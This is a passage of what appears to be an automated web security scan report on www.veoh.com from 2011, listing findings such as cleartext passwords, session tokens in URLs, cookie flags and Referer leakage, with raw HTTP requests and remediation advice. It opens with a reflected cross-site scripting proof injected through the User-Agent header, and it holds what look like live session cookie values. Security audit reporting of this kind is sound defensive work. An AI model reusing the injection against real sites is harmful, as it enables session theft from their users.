<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <input type="hidden" value="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)266d5"><script>alert(1)</script>a3477cdc5c1" id="flagUserAgent" name="flagUserAgent"/> ...[SNIP]...
2. Cleartext submission of passwordpreviousnext There are 8 instances of this issue:
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
Request
GET /webplayed.xml?action=PlayerLoaded&videoSequence=1&userWhoEmbedded=anonymous&playSequence=0&collectionId=&autoPlay=true&percent=&playerVersion=flash/VeohPlayer-Freewheel.7.0.0.40&player=videodetails&inVeoh=true&flashVersion=WIN%2010,1,103,20&affiliateId=&cachebuster=0.22769851004704833&apiId=0E13378F-874E-DB67-3E0B-113A55BC57F9&positionTime=0&volumeLevel=NaN&totalVideos=1&truncated=false&videoId=18978294&idSource=veoh&bufferStateEntered=0&userTime=2.565&playTime=0&bufferTime=0&stopTime=2.565&pauseTime=0&playerSessionID=e5df0bf7-4865-174d-7ab5-b481ea4a57e3&client=false HTTP/1.1 Host: www.veoh.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webplayed.xml?action=PlayerLoaded&videoSequence=1&userWhoEmbedded=anonymous&playSequence=0&collectionId=&autoPlay=true&percent=&playerVersion=flash/VeohPlayer-Freewheel.7.0.0.40&player=videodetails&inVeoh=true&flashVersion=WIN%2010,1,103,20&affiliateId=&cachebuster=0.22769851004704833&apiId=0E13378F-874E-DB67-3E0B-113A55BC57F9&positionTime=0&volumeLevel=NaN&totalVideos=1&truncated=false&videoId=18978294&idSource=veoh&bufferStateEntered=0&userTime=2.565&playTime=0&bufferTime=0&stopTime=2.565&pauseTime=0&playerSessionID=e5df0bf7-4865-174d-7ab5-b481ea4a57e3&client=false HTTP/1.1 Host: www.veoh.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/ Date: Thu, 03 Feb 2011 20:30:39 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=18 Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/ Date: Thu, 03 Feb 2011 20:30:37 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=53 Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]...
5. Cookie without HttpOnly flag setpreviousnext There are 4 instances of this issue:
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rest/v2/execute.xml?apiKey=5697781E-1C60-663B-FFD8-9B49D2B56D36&method=veoh.video.findByPermalink&permalink=v18978294NGnK88j8& HTTP/1.1 Host: www.veoh.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webplayed.xml?action=PlayerLoaded&videoSequence=1&userWhoEmbedded=anonymous&playSequence=0&collectionId=&autoPlay=true&percent=&playerVersion=flash/VeohPlayer-Freewheel.7.0.0.40&player=videodetails&inVeoh=true&flashVersion=WIN%2010,1,103,20&affiliateId=&cachebuster=0.22769851004704833&apiId=0E13378F-874E-DB67-3E0B-113A55BC57F9&positionTime=0&volumeLevel=NaN&totalVideos=1&truncated=false&videoId=18978294&idSource=veoh&bufferStateEntered=0&userTime=2.565&playTime=0&bufferTime=0&stopTime=2.565&pauseTime=0&playerSessionID=e5df0bf7-4865-174d-7ab5-b481ea4a57e3&client=false HTTP/1.1 Host: www.veoh.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B
The following cookie was issued by the application and does not have the HttpOnly flag set:
veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/ Date: Thu, 03 Feb 2011 20:30:39 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=18 Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/ Date: Thu, 03 Feb 2011 20:30:37 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=53 Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]...
6. Password field with autocomplete enabledpreviousnext There are 8 instances of this issue:
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3digxLTa3XKZOdgQfJltnlDw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CF0QuAIwCQ\\x26amp;q\\x3dsmartdesis\\x26amp;usg\\x3dAFQjCNGfJXOedr8EFUHoDTuNwPlaSxDDIA\\x22\\x3e\\x3cdiv HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=B57D97F4-FEFC-1CDA-FD1E-C2AF21F84319&LastUpdate=03/Feb/2011:12:30:37 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:37 GMT; Path=/ Date: Thu, 03 Feb 2011 20:30:37 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=80 Content-Length: 134607
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/ Date: Thu, 03 Feb 2011 20:30:39 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=18 Content-Length: 134607
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/ Date: Thu, 03 Feb 2011 20:30:37 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=53 Content-Length: 134607
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:27:56 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=92 Content-Length: 135910
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v189741093prNNZM5 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:28:22 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=98 Content-Length: 134924
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:29:02 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=91 Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/ Date: Thu, 03 Feb 2011 20:30:39 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=18 Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
